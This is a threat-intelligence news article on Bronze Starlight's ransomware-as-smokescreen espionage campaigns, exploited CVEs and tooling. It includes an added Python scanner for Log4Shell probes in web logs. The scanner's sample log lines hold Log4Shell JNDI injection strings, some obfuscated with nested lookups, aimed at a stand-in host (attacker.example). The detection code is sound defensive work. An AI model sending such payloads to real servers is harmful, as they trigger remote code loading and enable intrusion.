A China-based threat actor has been launching ransomware attacks against organizations in the U.S. and other countries, but evidence suggests it is using the ransomware as a “smokescreen” to disguise the espionage motives behind its campaigns.
The Bronze Starlight actor (also called DEV-0401 by Microsoft), active since early 2021, has been known to leverage a previously disclosed, custom DLL loader called HUI Loader in order to deploy Cobalt Strike and PlugX payloads for command and control as part of its attacks. Over the past year, the threat actor has relied on a lineup of five ransomware families - LockFile, AtomSilo, Rook, Night Sky and Pandora - and posted 21 victims to name-and-shame leak sites as of mid-April.
However, despite this ransomware activity, researchers believe that the threat actor’s end goal in these campaigns is stealing intellectual property as opposed to financial gain, and they estimated that 75 percent of the known victims would be of interest to Chinese government-sponsored groups focused on espionage based on the victims’ geographic locations and industry verticals. Over the past year, researchers have observed the group targeting pharmaceutical companies in Brazil and the U.S., electronic component designers and manufacturers in Lithuania and Japan, as well as a U.S. law firm and U.S.-based media organization with offices in China and Hong Kong.
“The victimology, short lifespan of each ransomware family, and access to malware used by government-sponsored threat groups suggest that Bronze Starlight’s main motivation may be intellectual property theft or cyberespionage rather than financial gain,” said Secureworks’ Counter Threat Unit Research Team in a Thursday analysis. “The ransomware could distract incident responders from identifying the threat actors’ true intent and reduce the likelihood of attributing the malicious activity to a government-sponsored Chinese threat group.”
Researchers believe the threat group uses the ransomware in these incidents to encrypt data after it has been exfiltrated, destroying forensic evidence of the espionage activity. The use of ransomware can also distract investigators from the true nature of the activity, since they will instead be focused on helping the business return to normal operations. In addition to the victimology, the operational cadence of these five ransomware families does not appear to align with conventional financially motivated cybercrime operations, said researchers.
“In each case, the ransomware targets a small number of victims over a relatively brief period of time before it ceases operations, apparently permanently,” they said.
Bronze Starlight compromises networks by exploiting known but unpatched vulnerabilities in network perimeter devices. In October, for instance, researchers observed ransomware precursor activity overlapping with LockFile activity, in which the actors exploited the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207) in a Microsoft Exchange server to deploy a web shell. Activity overlapping with the group has also been spotted in attacks targeting the Log4Shell vulnerability (CVE-2021-44228) and the Atlassian Confluence Server and Data Center flaw (CVE-2022-26134).
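Because the group's initial access relies on well-known exploits against internet-facing services, the first practitioner check is simply whether those exploit attempts are visible in existing web server logs. The script below is an added example, not code from the article or from the Secureworks report: it scans access log lines for Log4Shell (CVE-2021-44228) probes and, unlike a naive grep for `${jndi:`, first collapses the nested `${lower:...}`, `${upper:...}` and `${...:-default}` lookups that attackers used to hide that string. The log lines, hostnames and IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real telemetry). Lines 1-3 carry
# Log4Shell probes in plain, lower-case-obfuscated and default-value-obfuscated
# form; lines 0 and 4 are benign (line 4 uses a non-JNDI lookup on purpose).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:rmi}://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /prices?currency=${env:CURRENCY} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

# An innermost lookup: ${...} whose body contains no further '${' or braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(body: str) -> str:
    """Approximate what Log4j 2 substitutes for one non-nested lookup.

    Only the forms attackers use to disguise 'jndi' are resolved; any other
    lookup (env:, sys:, date:, and jndi: itself) is left intact so that the
    final pattern match can still see it.
    """
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${key:-default}: the key is unknown to us, so the default literal wins.
        return body.split(":-", 1)[1]
    return "${" + body + "}"


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then collapse nested lookups from the inside out.

    The loop stops when a round changes nothing; max_rounds bounds the work on
    pathological input. The result is what a literal search should run against.
    """
    text = unquote(text)
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve_inner(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line, after de-obfuscation, contains a JNDI lookup."""
    return bool(_JNDI.search(normalize_lookups(line)))


def scan(lines):
    """Return (index, normalized_line) for every line that looks like a probe."""
    return [(i, normalize_lookups(line)) for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for idx, shown in scan(SAMPLE_LOG_LINES):
        print(f"line {idx}: {shown}")
```

The normalization is deliberately approximate: Log4j's interpolator supports many more lookups and attackers found further evasions (for example Unicode case-folding tricks), so a detection like this is evidence of attempted exploitation, not proof of its absence. It also only tells you a probe arrived; whether the JNDI lookup succeeded is answered by outbound LDAP/RMI/DNS connections from the application host to the address in the payload, and the durable fix remains patching or removing the vulnerable JndiLookup class.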
Researchers said evidence points to Bronze Starlight itself developing the five ransomware families it has used in attacks. LockFile and AtomSilo share distinct code overlap, while Rook, Night Sky and Pandora appear to be built on the Babuk ransomware source code, which was reportedly leaked in September 2021 (a few months before the Rook operations started in December). The ransomware families do not appear to have been used by other threat groups, said researchers, and beyond the code overlaps in the ransomware strains themselves there are significant similarities across the campaigns, including the use of HUI Loader to load Cobalt Strike beacons, the Cobalt Strike beacon configuration information and the C2 infrastructure.
Researchers also noted a potential collaboration between the threat group and other China-based actors. Sharing of resources, information and in some cases malware has been observed more broadly among Chinese espionage groups. In a January incident response engagement, researchers observed that Bronze Starlight had compromised a server running ManageEngine ADSelfService Plus in order to deploy HUI Loader and a Cobalt Strike beacon. Another China-based threat group, called Bronze University, was active on the same network during this timeframe (mid-November to January), harvesting credentials and staging data for exfiltration. Meanwhile, Bronze Starlight abruptly suspended its activity in early December. While the reasons for this are unclear, “the simultaneous and continued operations by another Chinese threat group on the same network suggests that the two groups may have deconflicted their post-intrusion activity,” said researchers.
“This scenario assumes collaboration and knowledge sharing between the groups,” said researchers. “It could indicate that Bronze Starlight participates in government-sponsored intelligence-gathering efforts rather than being a purely financially motivated threat group.”